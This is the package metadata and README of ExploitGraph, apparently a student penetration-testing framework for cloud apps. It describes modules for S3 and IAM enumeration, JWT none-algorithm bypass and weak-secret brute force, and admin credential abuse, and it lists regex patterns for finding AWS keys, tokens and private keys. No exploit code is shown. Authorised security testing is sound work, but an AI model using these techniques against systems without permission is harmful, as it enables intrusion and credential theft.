Metadata-Version: 2.4
Name: exploitgraph
Version: 1.0.3
Summary: Automated attack path discovery and exploitation framework for cloud-native applications
Author-email: Prajwal Pawar <prajwal@exploitgraph.io>
License: MIT
Project-URL: Homepage, https://github.com/prajwalpawar/ExploitGraph
Project-URL: Repository, https://github.com/prajwalpawar/ExploitGraph
Project-URL: Bug Tracker, https://github.com/prajwalpawar/ExploitGraph/issues
Project-URL: Documentation, https://github.com/prajwalpawar/ExploitGraph/wiki
Keywords: security,pentesting,cloud,aws,attack-path,exploitation
Classifier: Development Status :: 4 - Beta
Classifier: Intended Audience :: Information Technology
Classifier: Topic :: Security
Classifier: License :: OSI Approved :: MIT License
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.9
Classifier: Programming Language :: Python :: 3.10
Classifier: Programming Language :: Python :: 3.11
Classifier: Programming Language :: Python :: 3.12
Classifier: Environment :: Console
Classifier: Operating System :: POSIX :: Linux
Classifier: Operating System :: MacOS
Requires-Python: >=3.9
Description-Content-Type: text/markdown
License-File: LICENSE
Requires-Dist: requests>=2.31.0
Requires-Dist: colorama>=0.4.6
Requires-Dist: networkx>=3.2.0
Requires-Dist: jinja2>=3.1.2
Requires-Dist: PyJWT>=2.8.0
Requires-Dist: python-dotenv>=1.0.0
Requires-Dist: tabulate>=0.9.0
Requires-Dist: pyyaml>=6.0
Provides-Extra: aws
Requires-Dist: boto3>=1.34.0; extra == "aws"
Requires-Dist: botocore>=1.34.0; extra == "aws"
Provides-Extra: dev
Requires-Dist: pytest>=7.0; extra == "dev"
Requires-Dist: black>=23.0; extra == "dev"
Requires-Dist: flake8>=6.0; extra == "dev"
Requires-Dist: mypy>=1.0; extra == "dev"
Provides-Extra: all
Requires-Dist: exploitgraph[aws,dev]; extra == "all"
Dynamic: license-file

# ExploitGraph

<div align="center">

```
███████╗██╗  ██╗██████╗ ██╗      ██████╗ ██╗████████╗ ██████╗ ██████╗  █████╗ ██████╗ ██╗  ██╗
██╔════╝╚██╗██╔╝██╔══██╗██║     ██╔═══██╗██║╚══██╔══╝██╔════╝ ██╔══██╗██╔══██╗██╔══██╗██║  ██║
█████╗   ╚███╔╝ ██████╔╝██║     ██║   ██║██║   ██║   ██║  ███╗██████╔╝███████║██████╔╝███████║
██╔══╝   ██╔██╗ ██╔═══╝ ██║     ██║   ██║██║   ██║   ██║   ██║██╔══██╗██╔══██║██╔═══╝ ██╔══██║
███████╗██╔╝ ██╗██║     ███████╗╚██████╔╝██║   ██║   ╚██████╔╝██║  ██║██║  ██║██║     ██║  ██║
╚══════╝╚═╝  ╚═╝╚═╝     ╚══════╝ ╚═════╝ ╚═╝   ╚═╝    ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝     ╚═╝  ╚═╝
```

**Automated Attack Path Discovery & Exploitation Framework**

[![Python](https://img.shields.io/badge/Python-3.9%2B-blue?logo=python)](https://python.org)
[![License](https://img.shields.io/badge/License-MIT-green)](LICENSE)
[![Platform](https://img.shields.io/badge/Platform-Linux%20%7C%20macOS-lightgrey)](https://github.com/prajwalpawar/ExploitGraph)
[![Modules](https://img.shields.io/badge/Modules-8%2B-red)](modules/)
[![AWS](https://img.shields.io/badge/AWS-Cloud%20Security-orange?logo=amazon-aws)](modules/cloud/)

</div>

---

## What is ExploitGraph?

ExploitGraph is a **modular, open-source attack path discovery framework** that automatically chains cloud misconfigurations, exposed secrets, and application vulnerabilities into a complete kill chain — starting from **zero prior knowledge**.

Unlike tools that require credentials first (Pacu) or only audit configurations (Prowler/ScoutSuite), ExploitGraph **starts from nothing** and discovers everything it needs:

```
Cloud Misconfiguration → Data Exposure → Secret Leakage → API Abuse → Full Compromise
```

Every step is visualized as an interactive attack graph with MITRE ATT&CK mappings and AWS remediation commands.

### How it differs from existing tools

| Tool | Starting Point | Output | Attack Chain |
|------|---------------|--------|--------------|
| **Pacu** | Needs IAM credentials | Module results | No chaining |
| **Prowler** | Needs AWS credentials | Audit findings | No chaining |
| **ScoutSuite** | Needs AWS credentials | Config report | No chaining |
| **TruffleHog** | Git repo / S3 bucket | Secret list | No chaining |
| **ExploitGraph** | **Just a URL** | **Full kill chain + visual graph** | **Automated** |

---

## Features

- **msfconsole-style interactive shell** with tab completion
- **8+ modular attack modules** across discovery, cloud, secrets, exploitation, reporting
- **Generic — works against any target** (not limited to fintech or specific apps)
- **Wordlist-driven discovery** — no hardcoded paths
- **20+ secret patterns** including AWS keys, JWT secrets, Stripe keys, GitHub tokens
- **Optional boto3 AWS integration** — real S3 ACL checks, IAM enumeration, MFA detection
- **JWT attack engine** — none-algorithm bypass, weak secret bruteforce
- **Interactive D3.js attack graph** in HTML report
- **CVSS scoring** per finding + session risk score (0-10)
- **MITRE ATT&CK for Cloud** mapping
- **Multi-session SQLite persistence** — resume scans across sessions
- **Offensive and defensive modes**
- **pip-installable** Python package

---

## Installation

### Quick Start
```bash
git clone https://github.com/prajwalpawar/ExploitGraph.git
cd ExploitGraph
pip install -r requirements.txt
python3 exploitgraph.py
```

### With AWS Support
```bash
pip install -r requirements.txt
pip install boto3 botocore
```

### Requirements
- Python 3.9+
- Linux / macOS (Kali Linux recommended)
- No AWS credentials required for HTTP-mode scanning

---

## Usage

### Interactive Console
```bash
python3 exploitgraph.py
```

```
exploitgraph> workspace new pentest http://target.com
exploitgraph> run auto
```

### CLI Mode
```bash
# Full automated attack chain
python3 exploitgraph.py -t http://target.com --auto

# Single module
python3 exploitgraph.py -t http://target.com -m cloud/s3_enum

# Defensive audit mode (no exploitation)
python3 exploitgraph.py -t http://target.com --mode defensive --auto

# List all modules
python3 exploitgraph.py --list-modules
```

### Console Commands
```
SESSION
  workspace new <name> <url>    Create workspace
  set TARGET http://target.com  Set target
  set MODE offensive|defensive  Set mode

MODULES
  show modules                  List all modules by category
  use discovery/http_enum       Select a module
  options                       Show module options
  set OPTION value              Configure option
  run                           Execute module
  run auto                      Full attack chain
  back                          Deselect module

INFORMATION
  show findings                 Security findings
  show secrets                  Extracted credentials
  show attack-path              ASCII kill chain
  show summary                  Risk score + stats
  info <module>                 Module details
  search <keyword>              Search modules

OUTPUT
  export html                   HTML report with D3.js graph
  export json                   JSON for SIEM integration
  export all                    All formats

SESSION MANAGEMENT
  sessions                      List sessions
  sessions -i <id>              Switch session
  sessions -k <id>              Kill session
```

---

## Modules

### Discovery
| Module | Description | MITRE |
|--------|-------------|-------|
| `discovery/http_enum` | Wordlist-driven endpoint enumeration + tech fingerprinting | T1595.003 |

### Cloud
| Module | Description | MITRE |
|--------|-------------|-------|
| `cloud/s3_enum` | S3 bucket discovery, public ACL detection, file download + boto3 audit | T1530 |
| `cloud/iam_enum` | IAM user/role enumeration, MFA checks, policy analysis (requires boto3) | T1580, T1078.004 |

### Secrets
| Module | Description | MITRE |
|--------|-------------|-------|
| `secrets/file_secrets` | 20+ pattern regex scanner + Shannon entropy detection | T1552.001 |

### Exploitation
| Module | Description | MITRE |
|--------|-------------|-------|
| `exploitation/api_exploit` | Generic credential testing, admin access, privilege escalation | T1078.004 |
| `exploitation/jwt_attack` | None-algorithm bypass, weak secret bruteforce, algorithm confusion | T1078, T1550.001 |

### Reporting
| Module | Description |
|--------|-------------|
| `reporting/html_report` | Interactive HTML report with D3.js attack graph, CVSS scores, MITRE mapping |
| `reporting/json_export` | Structured JSON for SIEM/ticketing integration |

---

## Secret Patterns (20+)

ExploitGraph detects the following credential types:

```
AWS Access Key ID          AKIA[0-9A-Z]{16}
AWS Secret Access Key      aws_secret_access_key = ...
JWT Secret                 jwt_secret_key = ...
Generic API Key            api_key = ...
Stripe Live Key            sk_live_...
GitHub Token               ghp_...
Google API Key             AIza...
SendGrid API Key           SG....
Slack Token                xox[baprs]-...
Database Password          db_password = ...
Database URL               postgresql://user:pass@host
Private Key                -----BEGIN RSA PRIVATE KEY-----
Bearer Token               Authorization: Bearer ...
Encryption Key             aes_key = [hex]
Admin Credentials          admin password = ...
Twilio SID                 AC[a-z0-9]{32}
Webhook Secret             webhook_secret = ...
High-Entropy Strings       Shannon entropy > 4.5
```

---

## MITRE ATT&CK for Cloud Coverage

| Technique | Name | Module |
|-----------|------|--------|
| T1595.003 | Wordlist Scanning | http_enum |
| T1580 | Cloud Infrastructure Discovery | s3_enum, iam_enum |
| T1530 | Data from Cloud Storage Object | s3_enum |
| T1552.001 | Credentials in Files | file_secrets |
| T1552.005 | Cloud Instance Metadata API | file_secrets |
| T1078.004 | Valid Accounts: Cloud Accounts | api_exploit, iam_enum |
| T1548 | Abuse Elevation Control Mechanism | api_exploit |
| T1550.001 | Application Access Token | jwt_attack |

---

## Demo: Vulnerable Target (Viva/Lab Use)

A deliberately vulnerable Flask fintech application is included for demonstration:

```bash
# Terminal 1 — Start target
cd target && python3 app.py
# Running at http://127.0.0.1:5000

# Terminal 2 — Attack it
python3 exploitgraph.py -t http://127.0.0.1:5000 --auto
```

The target simulates:
- Public S3 bucket with backup archive
- `.env` file with exposed AWS keys, API keys, JWT secrets
- Weak admin credentials in deployment notes
- Unauthenticated admin API endpoints
- Debug endpoint leaking configuration

> **The target app is for controlled lab environments only.**

---

## Writing Custom Modules

Create a file in `modules/custom/my_module.py`:

```python
from modules.base import BaseModule, ModuleResult

class MyModule(BaseModule):
    NAME        = "my_module"
    DESCRIPTION = "My custom scanner"
    CATEGORY    = "discovery"
    SEVERITY    = "HIGH"
    MITRE       = ["T1595"]

    OPTIONS = {
        "TARGET": {"default": "", "required": True, "description": "Target URL"},
    }

    def run(self, session):
        target = self.get_option("TARGET")
        # ... your logic ...
        session.add_finding(
            module="my_module",
            title="Finding Title",
            severity="HIGH",
            description="What was found",
            evidence="Proof",
            recommendation="How to fix",
            cvss_score=7.5,
        )
        return ModuleResult(True, {"found": True})
```

ExploitGraph automatically discovers and loads it. No configuration needed.

---

## Report Output

The HTML report includes:
- Executive summary with severity breakdown
- Interactive D3.js attack graph (drag, zoom, hover for details)
- Expandable findings with CVSS scores
- Evidence + proof-of-concept per finding
- AWS CLI remediation commands
- MITRE ATT&CK technique mapping
- Full secrets table
- Exploitation evidence log
- Session risk score (0-10)

---

## AWS Integration

With boto3 installed and credentials configured:

```bash
# Using AWS CLI profile
exploitgraph> use cloud/s3_enum
exploitgraph> set AWS_PROFILE my-profile
exploitgraph> run

# Using discovered credentials (auto-populated from file_secrets)
exploitgraph> use cloud/iam_enum
exploitgraph> run   # Picks up AWS keys found by file_secrets automatically
```

**All AWS operations are READ-ONLY** — no modifications to your AWS environment.

---

## Architecture

```
ExploitGraph/
├── exploitgraph.py          Entry point (CLI + console launcher)
├── core/
│   ├── console.py           msfconsole-style interactive shell
│   ├── module_loader.py     Dynamic plugin discovery & loading
│   ├── session_manager.py   SQLite-backed multi-session tracking
│   ├── attack_graph.py      networkx attack graph engine
│   ├── risk_engine.py       CVSS-style risk scoring
│   ├── logger.py            Structured colored logger
│   └── config.py            YAML configuration loader
├── modules/
│   ├── base.py              BaseModule abstract class
│   ├── discovery/           HTTP enumeration modules
│   ├── cloud/               AWS/cloud security modules
│   ├── secrets/             Credential extraction modules
│   ├── exploitation/        Attack execution modules
│   ├── reporting/           Report generation modules
│   └── custom/              Drop your own modules here
├── data/wordlists/          Attack wordlists
├── sessions/                SQLite session database
├── reports/                 Generated reports
└── target/                  Demo vulnerable application
```

---

## Legal Disclaimer

ExploitGraph is developed for **authorized security testing and educational purposes only**.

- Only use against systems you own or have explicit written permission to test
- The demo target application is for isolated lab environments only
- Unauthorized use against third-party systems is illegal

The author assumes no liability for misuse of this tool.

---

## License

MIT License — see [LICENSE](LICENSE)

---

## Author

**Prajwal Pawar**
B.Sc. Cyber Security — Final Year Project
School of Computer Application

---

## Contributing

Contributions welcome! See [CONTRIBUTING.md](CONTRIBUTING.md) for guidelines.

The easiest contribution: write a new module in `modules/custom/` following the `BaseModule` pattern and submit a PR.
